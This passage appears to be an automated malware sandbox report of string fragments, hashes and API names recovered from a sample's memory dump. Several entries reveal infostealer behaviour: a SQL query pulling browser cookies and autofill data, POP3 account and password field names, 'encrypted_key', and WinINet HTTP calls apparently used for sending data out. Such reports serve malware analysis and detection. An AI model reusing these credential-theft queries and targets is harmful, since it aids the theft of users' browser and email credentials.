                                                                                                                        • API String ID: 0-1002149817

                                                                                                                        Strings
                                                                                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                        • API String ID: 0-3236418099

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                        • API String ID: 0-3236418099
                                                                                                                        • Opcode ID: 3af229de2760c1ea113531c902ea5e8c4fbbe2d98837a0944b65bdd1953aa57e
                                                                                                                        • Instruction ID: c5fd0fda9ca91497e32403224d0106cc5ef06c98dff5a6f3757f0a25670b3f07
                                                                                                                        • Opcode Fuzzy Hash: 3af229de2760c1ea113531c902ea5e8c4fbbe2d98837a0944b65bdd1953aa57e
                                                                                                                        • Instruction Fuzzy Hash: C3410BB0D0031C9EEF60DFA59888BEEBBB9FF15748F1041A99508AA241D7B54B88CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                        • API String ID: 0-401266261
                                                                                                                        • Opcode ID: 90572a0f0ce5800b27bae656cf3a353df1470e2becc35c1083e2ed27c486b90e
                                                                                                                        • Instruction ID: 7fd389d06bdedabc3aba2e8e9b6f6d1079e00382229a5140dc0cfc3a79b15c6a
                                                                                                                        • Opcode Fuzzy Hash: 90572a0f0ce5800b27bae656cf3a353df1470e2becc35c1083e2ed27c486b90e
                                                                                                                        • Instruction Fuzzy Hash: 77C164B1D10318AAEB25DFA4DC49FEF7379EF58700F00419DA609A6190EBB15B88CF65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                        • API String ID: 0-2101568155
                                                                                                                        • Opcode ID: 1f295feb072f496c80b31de3aedbd3f5ca7b695454eb68267fd5e1516164225a
                                                                                                                        • Instruction ID: 47794de9aa8be1a9553d7212b2fd0cf122b11aab6e2aaf6d5f9007fddb110f88
                                                                                                                        • Opcode Fuzzy Hash: 1f295feb072f496c80b31de3aedbd3f5ca7b695454eb68267fd5e1516164225a
                                                                                                                        • Instruction Fuzzy Hash: 7A9184B1A00218AFEB10DF50DD89FFEB7B9EF54710F048199E908A6241E7B55A44CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                        • API String ID: 0-401266261
                                                                                                                        • Opcode ID: 0593fd4b4b8c93e193fcc948765629fa579d4a9ee872e526361d38d4413d8a57
                                                                                                                        • Instruction ID: 7170dc46fb27967f8448d9f29bc57b0cbb82a9f27dcfd9bf143a6441b7163829
                                                                                                                        • Opcode Fuzzy Hash: 0593fd4b4b8c93e193fcc948765629fa579d4a9ee872e526361d38d4413d8a57
                                                                                                                        • Instruction Fuzzy Hash: 009142B1D00318AADB65DFA4CC49FEEB7B9FF58700F00419DA50DA6150EBB15A88CF65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                        • API String ID: 0-2101568155
                                                                                                                        • Opcode ID: 34fa40b440c0fa48ae463c3257a7a036327894709166639f225e3945de1bdb25
                                                                                                                        • Instruction ID: bfd144bb4b7bfd03984cbf558b411ce2ec55341ac4a4b2aa916cda2b57223e06
                                                                                                                        • Opcode Fuzzy Hash: 34fa40b440c0fa48ae463c3257a7a036327894709166639f225e3945de1bdb25
                                                                                                                        • Instruction Fuzzy Hash: E08163B1A00218AFEB10DF94DC49FFEB7B9EF54714F008099EA08A7241E7B55A45CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: I$O$R$V$_$c$k$l$o$r$r$t$t$u$v$x
                                                                                                                        • API String ID: 0-2161164058
                                                                                                                        • Opcode ID: 8acd5d969bc916414436f70ab1cf9e3a7f61661cafc8d782a6a2db68af441312
                                                                                                                        • Instruction ID: 364bdbeedd115246cb0547a0b043f2c6a6d62e5d0c94a7452f466588be224aca
                                                                                                                        • Opcode Fuzzy Hash: 8acd5d969bc916414436f70ab1cf9e3a7f61661cafc8d782a6a2db68af441312
                                                                                                                        • Instruction Fuzzy Hash: 03313AB0D00218EFEB10DF98D848BEEBBB6BF14314F10415DE918A7241D7B95A48CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: I$O$R$V$_$c$k$l$o$r$r$t$t$u$v$x
                                                                                                                        • API String ID: 0-2161164058
                                                                                                                        • Opcode ID: ceac907d0bbcb80befb0d2227f823fe237370aef5d820813061726b429d9f8de
                                                                                                                        • Instruction ID: bfe7c0d5036dd4e898c22567a3a94a1675d709f27f77404640cdd365fab114c4
                                                                                                                        • Opcode Fuzzy Hash: ceac907d0bbcb80befb0d2227f823fe237370aef5d820813061726b429d9f8de
                                                                                                                        • Instruction Fuzzy Hash: 93315DB1D04218DFEB10DFA4D848BEEBBB5BF15308F00419DD518AB281D7B95A48CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                        • API String ID: 0-734595753
                                                                                                                        • Opcode ID: 8c91ce90f2d0f4b3590d5ce727ad10b732f2053edd8556ecf598059c30ddb6d2
                                                                                                                        • Instruction ID: 8d1afddbcc69671b552d14d22d141e9234de796fc8ce0315c38ce499adad0b7d
                                                                                                                        • Opcode Fuzzy Hash: 8c91ce90f2d0f4b3590d5ce727ad10b732f2053edd8556ecf598059c30ddb6d2
                                                                                                                        • Instruction Fuzzy Hash: EC51B1B6D00318AADB60DFA4DC58FEF73B8EF54704F044298EA4856141EBB56688CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                        • API String ID: 0-734595753
                                                                                                                        • Opcode ID: 08aea13bbd53ddbd6d312c01f88da486ad961603b588ef73bc9f9c9c14622c65
                                                                                                                        • Instruction ID: 3dcc0ec26bcdf55490e044a7bb07a8c83fbfc8e1be8bc7eedd3f3bd211fd3690
                                                                                                                        • Opcode Fuzzy Hash: 08aea13bbd53ddbd6d312c01f88da486ad961603b588ef73bc9f9c9c14622c65
                                                                                                                        • Instruction Fuzzy Hash: 7051B5B6D00218AADB60DB94DC58FEF73BDEF54704F004298EA4956141EBB56688CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                        • API String ID: 0-392141074
                                                                                                                        • Opcode ID: 02ab4b3bc4ba25f4c06a133773d830671b2394c40a667c2bccd697e74d86c5ce
                                                                                                                        • Instruction ID: 7703251965da221abd990f1b55d7fefcff205e861dcebe0e1f46f9896686cb1d
                                                                                                                        • Opcode Fuzzy Hash: 02ab4b3bc4ba25f4c06a133773d830671b2394c40a667c2bccd697e74d86c5ce
                                                                                                                        • Instruction Fuzzy Hash: 057153B1E10218AADB15DB94DC59FEFB77CBF14704F04419DEA08A6140EB746B48CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                                                        • API String ID: 0-2356907671
                                                                                                                        • Opcode ID: 6f5c82126e3493ceae3ee95127482b6c3b8d69aa57453b68eca8a7cff9232332
                                                                                                                        • Instruction ID: dde3232e7dba720e4fec5f6393fe89dc0cc30abbad2b11ceb42e88f2377efb11
                                                                                                                        • Opcode Fuzzy Hash: 6f5c82126e3493ceae3ee95127482b6c3b8d69aa57453b68eca8a7cff9232332
                                                                                                                        • Instruction Fuzzy Hash: 1381A6B2D00318AAEB51EBA4DC99FEF73BCEF64710F044599B908A6140EB755748CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$T$d$d$f$i$r$r$u$x
                                                                                                                        • API String ID: 0-2987356081
                                                                                                                        • Opcode ID: 25bb4d1f4f153c40ff0ea367cc05c7756a0e230a2865cd1d61a9490947c7d4f2
                                                                                                                        • Instruction ID: f944752ab6105e620c0bb6780ff5201f9287daa57db988c4bc8a9af3524322a1
                                                                                                                        • Opcode Fuzzy Hash: 25bb4d1f4f153c40ff0ea367cc05c7756a0e230a2865cd1d61a9490947c7d4f2
                                                                                                                        • Instruction Fuzzy Hash: 3C41B4F1900314AAEB21EB51AC4DFFFBBBCAF55750F04412DE90566180E7B65249CBB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                        • API String ID: 0-685823316
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                        • API String ID: 0-2304485323
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$unt$unt$word$word
                                                                                                                        • API String ID: 0-861207480
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$U$a$b$d$i$k$n$o
                                                                                                                        • API String ID: 0-3121204512
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: URL: $URL: $.$e$i$n$o$p
                                                                                                                        • API String ID: 0-3231755416
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: :$:$P$U$U$e$l$s
                                                                                                                        • API String ID: 0-522774390
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                        • API String ID: 0-2423294891
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                        • API String ID: 0-2423294891
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: UR$8$9$B$J$L: $L: $\
                                                                                                                        • API String ID: 0-1606297875
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: URL: $8$9$B$J$L: $\
                                                                                                                        • API String ID: 0-824068069
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$S$\$a$c$e$l
                                                                                                                        • API String ID: 0-3322591375
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                        • API String ID: 0-1024195942
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                        • API String ID: 0-4071423757
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: K$N$R$U$Z$Z$r
                                                                                                                        • API String ID: 0-872163569
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                        • API String ID: 0-1070052511
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                                                                                                        • API String ID: 0-4188302782
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$c$g$s$t$u
                                                                                                                        • API String ID: 0-3813946880
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$c$g$s$t$u
                                                                                                                        • API String ID: 0-3813946880
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                                        • API String ID: 0-2523166886
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: SELECT host_key, path, is_secure, expires_utc, name, value, encrypted_value FROM cookies$SELECT name, value FROM autofill$datetime$name: $time$value:
                                                                                                                        • API String ID: 0-2929464105
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 10$2008$2012$2016$7$8
                                                                                                                        • API String ID: 0-783846285
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 10$2008$2012$2016$7$8
                                                                                                                        • API String ID: 0-783846285
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                        • API String ID: 0-3155091674
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                                        • API String ID: 0-2523166886
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                        • API String ID: 0-4067651292
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %m$~$Gon~$~F@7$~draGon~$~draGon~
                                                                                                                        • API String ID: 0-652033395
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $i$l$o$u
                                                                                                                        • API String ID: 0-2051669658
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$e$o$y
                                                                                                                        • API String ID: 0-3109010100
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $i$l$o$u
                                                                                                                        • API String ID: 0-2051669658
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$a$b$d$i
                                                                                                                        • API String ID: 0-2334916691
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: guid$guid$hostname$httpRealm
                                                                                                                        • API String ID: 0-4083889933
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Gon~$~F@7%m$~$~draGon~$~draGon~
                                                                                                                        • API String ID: 0-735104890
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Account$POP3Account$POP3Password$Password
                                                                                                                        • API String ID: 0-3724906831
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
